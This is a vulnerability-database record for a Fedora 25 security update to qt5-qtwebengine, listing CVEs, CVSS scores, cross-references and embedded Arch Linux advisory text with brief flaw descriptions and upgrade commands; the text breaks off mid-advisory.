[SECURITY] Fedora 25 Update: qt5-qtwebengine-5.8.0-8.fc25

2017-04-16T20:24:38

Description

Qt5 - QtWebEngine components.

Affected Package

OS	OS Version	Package Name	Package Version
Fedora	25	qt5-qtwebengine	5.8.0

{"id": "FEDORA:24A9960157E1", "vendorId": null, "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 25 Update: qt5-qtwebengine-5.8.0-8.fc25", "description": "Qt5 - QtWebEngine components. ", "published": "2017-04-16T20:24:38", "modified": "2017-04-16T20:24:38", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/OMW5DLNYQFXDPKYD4LA66HQALQTPX54B/", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"], "immutableFields": [], "lastseen": "2020-12-21T08:17:54", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201610-15", "ASA-201612-3", "ASA-201702-2"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-1069", "CPAI-2016-1121"]}, {"type": "chrome", "idList": ["GCSA-1455133819237092676", "GCSA-6462542902786436405", "GCSA-7843997242018906576"]}, {"type": "cve", "idList": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3731-1:02966", "DEBIAN:DSA-3731-1:1ECEF"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-5182", "DEBIANCVE:CVE-2016-5183", "DEBIANCVE:CVE-2016-5189", "DEBIANCVE:CVE-2016-5199", "DEBIANCVE:CVE-2016-5201", "DEBIANCVE:CVE-2016-5203", "DEBIANCVE:CVE-2016-5204", "DEBIANCVE:CVE-2016-5205", "DEBIANCVE:CVE-2016-5206", "DEBIANCVE:CVE-2016-5207", "DEBIANCVE:CVE-2016-5208", "DEBIANCVE:CVE-2016-5210", "DEBIANCVE:CVE-2016-5211", "DEBIANCVE:CVE-2016-5212", "DEBIANCVE:CVE-2016-5213", "DEBIANCVE:CVE-2016-5214", "DEBIANCVE:CVE-2016-5215", "DEBIANCVE:CVE-2016-5216", "DEBIANCVE:CVE-2016-5217", "DEBIANCVE:CVE-2016-5218", "DEBIANCVE:CVE-2016-5219", "DEBIANCVE:CVE-2016-5221", "DEBIANCVE:CVE-2016-5222", "DEBIANCVE:CVE-2016-5223", "DEBIANCVE:CVE-2016-5224", "DEBIANCVE:CVE-2016-5225", "DEBIANCVE:CVE-2016-9650", "DEBIANCVE:CVE-2016-9651"]}, {"type": "fedora", "idList": ["FEDORA:0868860567DB", "FEDORA:187F860567E5", "FEDORA:3A44A6076F4B", "FEDORA:52D616079706", "FEDORA:6291A602F03A", "FEDORA:68F5B6074A4D", "FEDORA:6B6F7607924F", "FEDORA:C0FA66075F19", "FEDORA:E68A1603A526"]}, {"type": "freebsd", "idList": ["603FE0A1-BB26-11E6-8E5A-3065EC8FD3EC", "9118961B-9FA5-11E6-A265-3065EC8FD3EC", "A3473F5A-A739-11E6-AFAA-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201610-09", "GLSA-201611-16", "GLSA-201612-11"]}, {"type": "kaspersky", "idList": ["KLA10886", "KLA10903", "KLA10914", "KLA10949", "KLA10950"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/ACROBAT-CVE-2016-4107/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5205/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5221/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5224/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5225/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2016-5182/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2016-5217/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2016-5222/", "MSF:ILITIES/REDHAT_LINUX-CVE-2016-5182/", "MSF:ILITIES/REDHAT_LINUX-CVE-2016-5189/", "MSF:ILITIES/REDHAT_LINUX-CVE-2016-5194/", "MSF:ILITIES/SUSE-CVE-2016-5205/", "MSF:ILITIES/SUSE-CVE-2016-5206/", "MSF:ILITIES/SUSE-CVE-2016-5208/", "MSF:ILITIES/SUSE-CVE-2016-5212/", "MSF:ILITIES/SUSE-CVE-2016-5213/", "MSF:ILITIES/SUSE-CVE-2016-5215/", "MSF:ILITIES/SUSE-CVE-2016-5216/", "MSF:ILITIES/SUSE-CVE-2016-5219/", "MSF:ILITIES/SUSE-CVE-2016-5223/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787022"]}, {"type": "nessus", "idList": ["9687.PASL", "9790.PASL", "9829.PASL", "DEBIAN_DSA-3731.NASL", "FEDORA_2016-012DE4C97E.NASL", "FEDORA_2016-35049D9D97.NASL", "FEDORA_2016-A815B7BF5D.NASL", "FEDORA_2016-C671AAE490.NASL", "FEDORA_2016-E0E1CB2B2B.NASL", "FEDORA_2017-98BED96D12.NASL", "FEDORA_2017-AE1FDE5FB8.NASL", "FEDORA_2017-C5B2C9A435.NASL", "FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "FREEBSD_PKG_9118961B9FA511E6A2653065EC8FD3EC.NASL", "FREEBSD_PKG_A3473F5AA73911E6AFAAE8E0B747A45A.NASL", "GENTOO_GLSA-201610-09.NASL", "GENTOO_GLSA-201611-16.NASL", "GENTOO_GLSA-201612-11.NASL", "GOOGLE_CHROME_54_0_2840_59.NASL", "GOOGLE_CHROME_54_0_2840_99.NASL", "GOOGLE_CHROME_55_0_2883_75.NASL", "MACOSX_GOOGLE_CHROME_54_0_2840_59.NASL", "MACOSX_GOOGLE_CHROME_54_0_2840_98.NASL", "MACOSX_GOOGLE_CHROME_55_0_2883_75.NASL", "OPENSUSE-2016-1292.NASL", "OPENSUSE-2016-1365.NASL", "OPENSUSE-2016-1453.NASL", "OPENSUSE-2016-2597.NASL", "OPENSUSE-2017-119.NASL", "REDHAT-RHSA-2016-2067.NASL", "REDHAT-RHSA-2016-2718.NASL", "REDHAT-RHSA-2016-2919.NASL", "UBUNTU_USN-3113-1.NASL", "UBUNTU_USN-3133-1.NASL", "UBUNTU_USN-3153-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703731", "OPENVAS:1361412562310809072", "OPENVAS:1361412562310809073", "OPENVAS:1361412562310809074", "OPENVAS:1361412562310809095", "OPENVAS:1361412562310809097", "OPENVAS:1361412562310809098", "OPENVAS:1361412562310810156", "OPENVAS:1361412562310810191", "OPENVAS:1361412562310810192", "OPENVAS:1361412562310810228", "OPENVAS:1361412562310810229", "OPENVAS:1361412562310810230", "OPENVAS:1361412562310842940", "OPENVAS:1361412562310842973", "OPENVAS:1361412562310842990", "OPENVAS:1361412562310851416", "OPENVAS:1361412562310851433", "OPENVAS:1361412562310851453", "OPENVAS:1361412562310872074", "OPENVAS:1361412562310872096", "OPENVAS:1361412562310872151", "OPENVAS:1361412562310872153", "OPENVAS:1361412562310872576", "OPENVAS:1361412562310872901", "OPENVAS:703731"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142939"]}, {"type": "redhat", "idList": ["RHSA-2016:2067", "RHSA-2016:2718", "RHSA-2016:2919"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-5182", "RH:CVE-2016-5183", "RH:CVE-2016-5189", "RH:CVE-2016-5199", "RH:CVE-2016-5201", "RH:CVE-2016-5203", "RH:CVE-2016-5204", "RH:CVE-2016-5205", "RH:CVE-2016-5206", "RH:CVE-2016-5207", "RH:CVE-2016-5208", "RH:CVE-2016-5210", "RH:CVE-2016-5211", "RH:CVE-2016-5212", "RH:CVE-2016-5213", "RH:CVE-2016-5214", "RH:CVE-2016-5215", "RH:CVE-2016-5216", "RH:CVE-2016-5217", "RH:CVE-2016-5218", "RH:CVE-2016-5219", "RH:CVE-2016-5221", "RH:CVE-2016-5222", "RH:CVE-2016-5223", "RH:CVE-2016-5224", "RH:CVE-2016-5225", "RH:CVE-2016-9650", "RH:CVE-2016-9651"]}, {"type": "seebug", "idList": ["SSV:92999", "SSV:93000", "SSV:93001"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2597-1", "OPENSUSE-SU-2016:2792-1", "OPENSUSE-SU-2016:2793-1", "OPENSUSE-SU-2016:3108-1", "OPENSUSE-SU-2017:0563-1", "SUSE-SU-2016:2598-1"]}, {"type": "threatpost", "idList": ["THREATPOST:0B82F0050CB73CDB74D96D4EB0C2E303", "THREATPOST:8824503BC1A2C5007509D80EDDF5E01C"]}, {"type": "ubuntu", "idList": ["USN-3113-1", "USN-3133-1", "USN-3153-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-5182", "UB:CVE-2016-5183", "UB:CVE-2016-5189", "UB:CVE-2016-5199", "UB:CVE-2016-5201", "UB:CVE-2016-5203", "UB:CVE-2016-5204", "UB:CVE-2016-5205", "UB:CVE-2016-5206", "UB:CVE-2016-5207", "UB:CVE-2016-5208", "UB:CVE-2016-5210", "UB:CVE-2016-5211", "UB:CVE-2016-5212", "UB:CVE-2016-5213", "UB:CVE-2016-5214", "UB:CVE-2016-5215", "UB:CVE-2016-5216", "UB:CVE-2016-5217", "UB:CVE-2016-5218", "UB:CVE-2016-5219", "UB:CVE-2016-5221", "UB:CVE-2016-5222", "UB:CVE-2016-5223", "UB:CVE-2016-5224", "UB:CVE-2016-5225", "UB:CVE-2016-9650", "UB:CVE-2016-9651"]}, {"type": "zdt", "idList": ["1337DAY-ID-27954"]}], "rev": 4}, "score": {"value": 7.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201610-15", "ASA-201612-3"]}, {"type": "chrome", "idList": ["GCSA-7843997242018906576"]}, {"type": "cve", "idList": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3731-1:02966"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-5203", "DEBIANCVE:CVE-2016-5204", "DEBIANCVE:CVE-2016-5205", "DEBIANCVE:CVE-2016-5206", "DEBIANCVE:CVE-2016-5207", "DEBIANCVE:CVE-2016-5208", "DEBIANCVE:CVE-2016-5210", "DEBIANCVE:CVE-2016-5211", "DEBIANCVE:CVE-2016-5212", "DEBIANCVE:CVE-2016-5213", "DEBIANCVE:CVE-2016-5214", "DEBIANCVE:CVE-2016-5215", "DEBIANCVE:CVE-2016-5216", "DEBIANCVE:CVE-2016-5217", "DEBIANCVE:CVE-2016-5218", "DEBIANCVE:CVE-2016-5219", "DEBIANCVE:CVE-2016-5221", "DEBIANCVE:CVE-2016-5222", "DEBIANCVE:CVE-2016-5223", "DEBIANCVE:CVE-2016-5224", "DEBIANCVE:CVE-2016-5225", "DEBIANCVE:CVE-2016-9650", "DEBIANCVE:CVE-2016-9651"]}, {"type": "fedora", "idList": ["FEDORA:6B6F7607924F"]}, {"type": "freebsd", "idList": ["603FE0A1-BB26-11E6-8E5A-3065EC8FD3EC", "A3473F5A-A739-11E6-AFAA-E8E0B747A45A"]}, {"type": "gentoo", "idList": ["GLSA-201612-11"]}, {"type": "kaspersky", "idList": ["KLA10949"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/GENTOO-LINUX-CVE-2016-5205/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5221/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5224/", "MSF:ILITIES/GENTOO-LINUX-CVE-2016-5225/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2016-5217/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2016-5222/"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "FREEBSD_PKG_A3473F5AA73911E6AFAAE8E0B747A45A.NASL", "GENTOO_GLSA-201612-11.NASL", "GOOGLE_CHROME_54_0_2840_59.NASL", "GOOGLE_CHROME_54_0_2840_99.NASL", "GOOGLE_CHROME_55_0_2883_75.NASL", "MACOSX_GOOGLE_CHROME_54_0_2840_59.NASL", "MACOSX_GOOGLE_CHROME_54_0_2840_98.NASL", "MACOSX_GOOGLE_CHROME_55_0_2883_75.NASL", "OPENSUSE-2016-1292.NASL", "OPENSUSE-2016-1453.NASL", "OPENSUSE-2016-2597.NASL", "OPENSUSE-2017-119.NASL", "REDHAT-RHSA-2016-2067.NASL", "REDHAT-RHSA-2016-2718.NASL", "REDHAT-RHSA-2016-2919.NASL", "UBUNTU_USN-3153-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810228", "OPENVAS:1361412562310810229", "OPENVAS:1361412562310810230", "OPENVAS:1361412562310842990", "OPENVAS:1361412562310851453"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142939"]}, {"type": "redhat", "idList": ["RHSA-2016:2067"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-5203", "RH:CVE-2016-5204", "RH:CVE-2016-5205", "RH:CVE-2016-5206", "RH:CVE-2016-5207", "RH:CVE-2016-5208", "RH:CVE-2016-5210", "RH:CVE-2016-5211", "RH:CVE-2016-5212", "RH:CVE-2016-5213", "RH:CVE-2016-5214", "RH:CVE-2016-5215", "RH:CVE-2016-5216", "RH:CVE-2016-5217", "RH:CVE-2016-5218", "RH:CVE-2016-5219", "RH:CVE-2016-5221", "RH:CVE-2016-5222", "RH:CVE-2016-5223", "RH:CVE-2016-5224", "RH:CVE-2016-5225", "RH:CVE-2016-9650", "RH:CVE-2016-9651"]}, {"type": "seebug", "idList": ["SSV:92999", "SSV:93000", "SSV:93001"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:2597-1", "OPENSUSE-SU-2016:2792-1", "OPENSUSE-SU-2016:2793-1", "OPENSUSE-SU-2016:3108-1", "SUSE-SU-2016:2598-1"]}, {"type": "threatpost", "idList": ["THREATPOST:8824503BC1A2C5007509D80EDDF5E01C"]}, {"type": "ubuntu", "idList": ["USN-3153-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-5203", "UB:CVE-2016-5204", "UB:CVE-2016-5205", "UB:CVE-2016-5206", "UB:CVE-2016-5207", "UB:CVE-2016-5208", "UB:CVE-2016-5210", "UB:CVE-2016-5211", "UB:CVE-2016-5212", "UB:CVE-2016-5213", "UB:CVE-2016-5214", "UB:CVE-2016-5215", "UB:CVE-2016-5216", "UB:CVE-2016-5217", "UB:CVE-2016-5218", "UB:CVE-2016-5219", "UB:CVE-2016-5221", "UB:CVE-2016-5222", "UB:CVE-2016-5223", "UB:CVE-2016-5224", "UB:CVE-2016-5225", "UB:CVE-2016-9650", "UB:CVE-2016-9651"]}, {"type": "zdt", "idList": ["1337DAY-ID-27954"]}]}, "exploitation": null, "vulnersScore": 7.0}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "25", "arch": "any", "packageName": "qt5-qtwebengine", "packageVersion": "5.8.0", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"archlinux": [{"lastseen": "2021-07-28T14:34:10", "description": "Arch Linux Security Advisory ASA-201702-2\n=========================================\n\nSeverity: High\nDate : 2017-02-02\nCVE-ID : CVE-2016-5182 CVE-2016-5183 CVE-2016-5189 CVE-2016-5199\nCVE-2016-5201 CVE-2016-5203 CVE-2016-5204 CVE-2016-5205\nCVE-2016-5206 CVE-2016-5207 CVE-2016-5208 CVE-2016-5210\nCVE-2016-5211 CVE-2016-5212 CVE-2016-5213 CVE-2016-5214\nCVE-2016-5215 CVE-2016-5216 CVE-2016-5217 CVE-2016-5218\nCVE-2016-5219 CVE-2016-5221 CVE-2016-5222 CVE-2016-5223\nCVE-2016-5224 CVE-2016-5225 CVE-2016-9650 CVE-2016-9651\nPackage : qt5-webengine\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-162\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.8.0-1 is vulnerable to\nmultiple issues including access restriction bypass, arbitrary code\nexecution, arbitrary filesystem access, cross-site scripting, same-\norigin policy bypass, content spoofing, information disclosure and\ninsufficient validation.\n\nResolution\n==========\n\nUpgrade to 5.8.0-1.\n\n# pacman -Syu \"qt5-webengine>=5.8.0-1\"\n\nThe problems have been fixed upstream in version 5.8.0.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-5182 (arbitrary code execution)\n\nA heap overflow flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5183 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5189 (content spoofing)\n\nAn URL spoofing flaw was found in the Chromium browser.\n\n- CVE-2016-5199 (arbitrary code execution)\n\nFFMPEG MP4 decoder contains an off-by-one error resulting in an\nallocation of size 0, followed by corrupting an arbitrary number of\npointers out of bounds on the heap, where each is pointing to\ncontrollable or uninitialized data. A remote attacker can potentially\nuse this flaw to exploit heap corruption via a crafted video file.\n\n- CVE-2016-5201 (information disclosure)\n\nAn information disclosure flaw was found in the extensions component of\nthe Chromium browser before 54.0.2840.100.\n\n- CVE-2016-5203 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5204 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5205 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5206 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5207 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5208 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5210 (arbitrary code execution)\n\nAn out of bounds write flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5211 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5212 (arbitrary filesystem access)\n\nA local file disclosure flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5213 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5214 (insufficient validation)\n\nA file download protection bypass was discovered in the Chromium\nbrowser.\n\n- CVE-2016-5215 (arbitrary code execution)\n\nAn use after free flaw was found in the Webaudio component of the\nChromium browser.\n\n- CVE-2016-5216 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5217 (insufficient validation)\n\nAn use of unvalidated data flaw was found in the PDFium component of\nthe Chromium browser.\n\n- CVE-2016-5218 (content spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5219 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5221 (arbitrary code execution)\n\nAn integer overflow flaw was found in the ANGLE component of the\nChromium browser.\n\n- CVE-2016-5222 (content spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5223 (arbitrary code execution)\n\nAn integer overflow flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5224 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the SVG component of the\nChromium browser.\n\n- CVE-2016-5225 (access restriction bypass)\n\nA CSP bypass flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-9650 (information disclosure)\n\nA CSP referrer disclosure vulnerability has been discovered in the\nChromium browser.\n\n- CVE-2016-9651 (access restriction bypass)\n\nA private property access flaw was found in the V8 component of the\nChromium browser.\n\nImpact\n======\n\nA remote attacker might be able to bypass access restrictions, access\nsensitive information or files, and execute arbitrary code on the\naffected host.\n\nReferences\n==========\n\nhttps://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.8.0\nhttps://googlechromereleases.blogspot.fr/2016/10/stable-channel-update-for-desktop.html\nhttps://chromereleases.googleblog.com/2016/11/stable-channel-update-for-desktop_9.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=643948\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=660678\nhttps://googlechromereleases.blogspot.fr/2016/12/stable-channel-update-for-desktop.html\nhttps://security.archlinux.org/CVE-2016-5182\nhttps://security.archlinux.org/CVE-2016-5183\nhttps://security.archlinux.org/CVE-2016-5189\nhttps://security.archlinux.org/CVE-2016-5199\nhttps://security.archlinux.org/CVE-2016-5201\nhttps://security.archlinux.org/CVE-2016-5203\nhttps://security.archlinux.org/CVE-2016-5204\nhttps://security.archlinux.org/CVE-2016-5205\nhttps://security.archlinux.org/CVE-2016-5206\nhttps://security.archlinux.org/CVE-2016-5207\nhttps://security.archlinux.org/CVE-2016-5208\nhttps://security.archlinux.org/CVE-2016-5210\nhttps://security.archlinux.org/CVE-2016-5211\nhttps://security.archlinux.org/CVE-2016-5212\nhttps://security.archlinux.org/CVE-2016-5213\nhttps://security.archlinux.org/CVE-2016-5214\nhttps://security.archlinux.org/CVE-2016-5215\nhttps://security.archlinux.org/CVE-2016-5216\nhttps://security.archlinux.org/CVE-2016-5217\nhttps://security.archlinux.org/CVE-2016-5218\nhttps://security.archlinux.org/CVE-2016-5219\nhttps://security.archlinux.org/CVE-2016-5221\nhttps://security.archlinux.org/CVE-2016-5222\nhttps://security.archlinux.org/CVE-2016-5223\nhttps://security.archlinux.org/CVE-2016-5224\nhttps://security.archlinux.org/CVE-2016-5225\nhttps://security.archlinux.org/CVE-2016-9650\nhttps://security.archlinux.org/CVE-2016-9651", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-02T00:00:00", "type": "archlinux", "title": "[ASA-201702-2] qt5-webengine: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"], "modified": "2017-02-02T00:00:00", "id": "ASA-201702-2", "href": "https://security.archlinux.org/ASA-201702-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:34:11", "description": "Arch Linux Security Advisory ASA-201612-3\n=========================================\n\nSeverity: Critical\nDate : 2016-12-03\nCVE-ID : CVE-2016-5203 CVE-2016-5204 CVE-2016-5205 CVE-2016-5206\nCVE-2016-5207 CVE-2016-5208 CVE-2016-5209 CVE-2016-5210\nCVE-2016-5211 CVE-2016-5212 CVE-2016-5213 CVE-2016-5214\nCVE-2016-5215 CVE-2016-5216 CVE-2016-5217 CVE-2016-5218\nCVE-2016-5219 CVE-2016-5220 CVE-2016-5221 CVE-2016-5222\nCVE-2016-5223 CVE-2016-5224 CVE-2016-5225 CVE-2016-5226\nCVE-2016-9650 CVE-2016-9651 CVE-2016-9652\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package chromium before version 55.0.2883.75-1 is vulnerable to\nmultiple issues including arbitrary code execution, access restriction\nbypass, arbitrary filesystem access, cross-site scripting, same-origin\npolicy bypass, content spoofing, insufficient validation and\ninformation disclosure.\n\nResolution\n==========\n\nUpgrade to 55.0.2883.75-1.\n\n# pacman -Syu \"chromium>=55.0.2883.75-1\"\n\nThe problems have been fixed upstream in version 55.0.2883.75.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-5203 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5204 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5205 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5206 (same-origin policy bypass)\n\nA same-origin bypass flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5207 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5208 (cross-site scripting)\n\nAn universal XSS flaw was found in the Blink component of the Chromium\nbrowser.\n\n- CVE-2016-5209 (arbitrary code execution)\n\nAn out of bounds write flaw was found in the Blink component of the\nChromium browser.\n\n- CVE-2016-5210 (arbitrary code execution)\n\nAn out of bounds write flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5211 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5212 (arbitrary filesystem access)\n\nA local file disclosure flaw was found in the DevTools component of the\nChromium browser.\n\n- CVE-2016-5213 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5214 (insufficient validation)\n\nA file download protection bypass was discovered in the Chromium\nbrowser.\n\n- CVE-2016-5215 (arbitrary code execution)\n\nAn use after free flaw was found in the Webaudio component of the\nChromium browser.\n\n- CVE-2016-5216 (arbitrary code execution)\n\nAn use after free flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5217 (insufficient validation)\n\nAn use of unvalidated data flaw was found in the PDFium component of\nthe Chromium browser.\n\n- CVE-2016-5218 (content spoofing)\n\nAn address spoofing flaw was found in the Omnibox component of the\nChromium browser.\n\n- CVE-2016-5219 (arbitrary code execution)\n\nAn use after free flaw was found in the V8 component of the Chromium\nbrowser.\n\n- CVE-2016-5220 (arbitrary filesystem access)\n\nA local file access flaw was found in the PDFium component of the\nChromium browser.\n\n- CVE-2016-5221 (arbitrary code execution)\n\nAn integer overflow flaw was found in the ANGLE component of the\nChromium browser.\n\n- CVE-2016-5222 (content 